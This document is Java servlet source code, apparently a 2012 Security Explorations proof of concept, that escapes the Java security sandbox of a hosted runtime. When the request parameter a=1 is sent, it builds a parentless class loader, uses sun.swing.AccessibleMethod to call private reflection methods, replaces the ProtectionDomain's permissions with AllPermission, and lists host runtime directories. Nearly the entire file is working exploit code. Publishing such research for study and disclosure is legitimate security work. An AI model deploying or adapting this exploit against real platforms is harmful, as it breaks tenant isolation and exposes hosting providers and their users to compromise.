/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.security.*;
import java.io.*;
import java.net.*;
import java.awt.*;
import java.util.*;
import javax.servlet.http.*;

public class MyFirstJAppServlet extends HttpServlet {
 public static PrintWriter pw;

 public static Class helper_class;
 public static ClassLoader escape_cl;

 public static Class api_class;

 public void init_escape() {
  try {
   ClassLoader cl=getClass().getClassLoader();
   URLClassLoader ucl=(URLClassLoader)cl;
   URL utab[]=ucl.getURLs();

   Class c=Class.forName("java.net.URLClassLoader");

   Class ctab[]=new Class[2];
   ctab[0]=(new URL[0]).getClass();
   ctab[1]=Class.forName("java.lang.ClassLoader");

   Constructor con=c.getConstructor(ctab);

   Object args[]=new Object[2];
   args[0]=utab;
   args[1]=null;

   escape_cl=(ClassLoader)con.newInstance(args);
   helper_class=escape_cl.loadClass("Helper");
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

 public static Class load(String name) {
  Class res=null;

  try {
   res=escape_cl.loadClass(name);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return  res;
 }
  
 public static Object create_instance(String name,Object cargs[]) {
  Object res=null;

  try {
   ClassLoader cl=escape_cl;

   Class c=cl.loadClass(name);
   pw.println("c "+c);

   Class ctab[]=new Class[cargs.length];

   for(int i=0;i<cargs.length;i++) {
    ctab[i]=cargs[i].getClass();
   }
  
   Constructor con=c.getConstructor(ctab);
   pw.println("con "+con);

   ctab=new Class[2];
   ctab[0]=Class.forName("java.lang.reflect.Constructor");
   ctab[1]=(new Object[0]).getClass();

   Method m=helper_class.getMethod("create",ctab);
   pw.println("m: "+m);
   
   Object args[]=new Object[2];
   args[0]=con;
   args[1]=cargs;

   res=m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return res;
 }

 public static Object invoke_static(String name,String method,Object margs[]) {
  Object res=null;

  try {
   ClassLoader cl=escape_cl;

   Class c=cl.loadClass(name);
   pw.println("c "+c);

   Class ctab[]=new Class[margs.length];

   for(int i=0;i<margs.length;i++) {
    ctab[i]=margs[i].getClass();
   }
  
   Method met=c.getMethod(method,ctab);
   pw.println("met "+met);

   ctab=new Class[3];
   ctab[0]=Class.forName("java.lang.reflect.Method");
   ctab[1]=Class.forName("java.lang.Object");
   ctab[2]=(new Object[0]).getClass();

   Method m=helper_class.getMethod("invoke",ctab);
   pw.println("m: "+m);

   Object cargs[]=margs;
   
   Object args[]=new Object[3];
   args[0]=met;
   args[1]=null;
   args[2]=cargs;

   res=m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return res;
 }

 public static Object invoke_virtual(Object instance,String method,Object margs[],Class refctab[]) {
  Object res=null;

  try {
   ClassLoader cl=escape_cl;

   Class c=instance.getClass();
   pw.println("c "+c);

   Class ctab[]=refctab;

   if (ctab==null) {
    ctab=new Class[margs.length];

    for(int i=0;i<margs.length;i++) {
     ctab[i]=margs[i].getClass();
    }
   }
 
   Method met=c.getMethod(method,ctab);
   pw.println("met "+met);

   ctab=new Class[3];
   ctab[0]=Class.forName("java.lang.reflect.Method");
   ctab[1]=Class.forName("java.lang.Object");
   ctab[2]=(new Object[0]).getClass();

   Method m=helper_class.getMethod("invoke",ctab);
   pw.println("m: "+m);

   Object cargs[]=margs;
   
   Object args[]=new Object[3];
   args[0]=met;
   args[1]=instance;
   args[2]=cargs;

   res=m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return res;
 }

 public Field get_field(String clazz,String name) {
  Field res=null;

  try {
   //create AccessibleMethod object for invoking getDeclaredFields0 method of java.lang.Class class
   Class ctab[]=new Class[1];
   ctab[0]=Boolean.TYPE;

   Object args[]=new Object[3];
   args[0]=Class.forName("java.lang.Class");
   args[1]="getDeclaredFields0";
   args[2]=ctab;

   Object am_getDeclaredFields0=create_instance("sun.swing.AccessibleMethod",args);
   pw.println("am_getDeclaredFields0: "+am_getDeclaredFields0);

   //invoke getDeclaredFields0 method on target class instance
   Object iargs[]=new Object[1];
   iargs[0]=new Boolean(false);

   args=new Object[2];
   args[0]=load(clazz);
   args[1]=iargs;

   ctab=new Class[2];
   ctab[0]=Class.forName("java.lang.Object");
   ctab[1]=(new Object[0]).getClass();

   Field ftab[]=(Field[])invoke_virtual(am_getDeclaredFields0,"invoke",args,ctab);
   pw.println("ftab: "+ftab+" len "+ftab.length);

   //lookup target field by name
   for(int i=0;i<ftab.length;i++) {
    Field f=ftab[i];

    if (f.getName().equals(name)) {
     res=f;
     break;
    }
   }

  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return res;
 }

 public void set_accessible(AccessibleObject ao) {
  try {
   //create AccessibleMethod object for invoking setAccessible0 method of java.lang.reflect.AccessibleObject class
   Class ctab[]=new Class[2];
   ctab[0]=Class.forName("java.lang.reflect.AccessibleObject");
   ctab[1]=Boolean.TYPE;

   Object args[]=new Object[3];
   args[0]=Class.forName("java.lang.reflect.AccessibleObject");
   args[1]="setAccessible0";
   args[2]=ctab;

   Object am_setAccessible0=create_instance("sun.swing.AccessibleMethod",args);
   pw.println("am_setAccessible0: "+am_setAccessible0);

   //invoke setAccessible0 method on target AccessibleObject instance
   Object iargs[]=new Object[2];
   iargs[0]=ao;
   iargs[1]=new Boolean(true);

   args=new Object[2];
   args[0]=null;
   args[1]=iargs;

   ctab=new Class[2];
   ctab[0]=Class.forName("java.lang.Object");
   ctab[1]=(new Object[0]).getClass();

   invoke_virtual(am_setAccessible0,"invoke",args,ctab);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

 public static Object get_value(Field f,Object instance) {
  Object res=null;

  try {
   Class ctab[]=new Class[2];
   ctab[0]=Class.forName("java.lang.reflect.Field");
   ctab[1]=Class.forName("java.lang.Object");

   Method m=helper_class.getMethod("get",ctab);
   pw.println("m: "+m);
   
   Object args[]=new Object[2];
   args[0]=f;
   args[1]=instance;

   res=m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return res;
 }

 public static void set_value(Field f,Object instance,Object val) {
  Object res=null;

  try {
   Class ctab[]=new Class[3];
   ctab[0]=Class.forName("java.lang.reflect.Field");
   ctab[1]=Class.forName("java.lang.Object");
   ctab[2]=Class.forName("java.lang.Object");

   Method m=helper_class.getMethod("set",ctab);
   pw.println("m: "+m);
   
   Object args[]=new Object[3];
   args[0]=f;
   args[1]=instance;
   args[2]=val;

   m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

 public void ls(String name) {
  try {
   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.lang.String");

   Method m=api_class.getMethod("jvm_dir",ctab);
   pw.println("m: "+m);
   
   Object args[]=new Object[1];
   args[0]=name;

   m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

 public InputStream open(String name) {
  InputStream res=null;

  try {
   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.lang.String");

   Method m=api_class.getMethod("jvm_open",ctab);
   pw.println("m: "+m);
   
   Object args[]=new Object[1];
   args[0]=name;

   res=(InputStream)m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  

  return res;
 }

 public void test_ls(PrintWriter out) {
  try {
   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.io.PrintWriter");

   Method m=api_class.getMethod("setOut",ctab);
   pw.println("m: "+m);
   
   Object args[]=new Object[1];
   args[0]=out;

   m.invoke(null,args);

   ls("/base/java_runtime/");
   ls("/base/java_runtime/api/");
   ls("/base/java_runtime/skeleton/");
   ls("/base/java_runtime/prebundled/");
   ls("/base/jre/");
   ls("/base/jre/lib/");
   ls("/base/jre/lib/ext");
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

 public void dowork(PrintWriter out) {
  try {
   out.println("dowork");

   api_class=escape_cl.loadClass("API");

   test_ls(out);
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

 public void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String param=req.getParameter("a");

  resp.setContentType("text/plain");
  resp.getWriter().println("Hello, it works!");

  if ((param==null)||(!param.equals("1"))) {
   return;
  }

  pw=resp.getWriter();

  try {
   //initialize escaping class loader and bouncer class
   init_escape();

   //find "permissions" field of java.security.ProtectionDomain class
   Field f_permissions=get_field("java.security.ProtectionDomain","permissions");
   pw.println("f_permissions: "+f_permissions);
   pw.println("f_permissions.isAccessible(): "+f_permissions.isAccessible());

   //override Java protection for the "permissions" field of java.security.ProtectionDomain class
   set_accessible(f_permissions);
   pw.println("f_permissions.isAccessible(): "+f_permissions.isAccessible());

   //get current permissions
   ProtectionDomain pd=helper_class.getProtectionDomain();
   Object org_perms=get_value(f_permissions,pd);

   pw.println("pd before: "+pd);

   Permissions all=new Permissions();
   all.add(new AllPermission());

   //set new permissions to all
   set_value(f_permissions,pd,all);
   pw.println("pd after: "+pd);

   dowork(pw);

   //restore original permissions
   set_value(f_permissions,pd,org_perms);

   pw.println("pd clean: "+pd);

   pw.println("[DONE]");
  } catch(Throwable t) {
   t.printStackTrace(pw);
  }  
 }

}
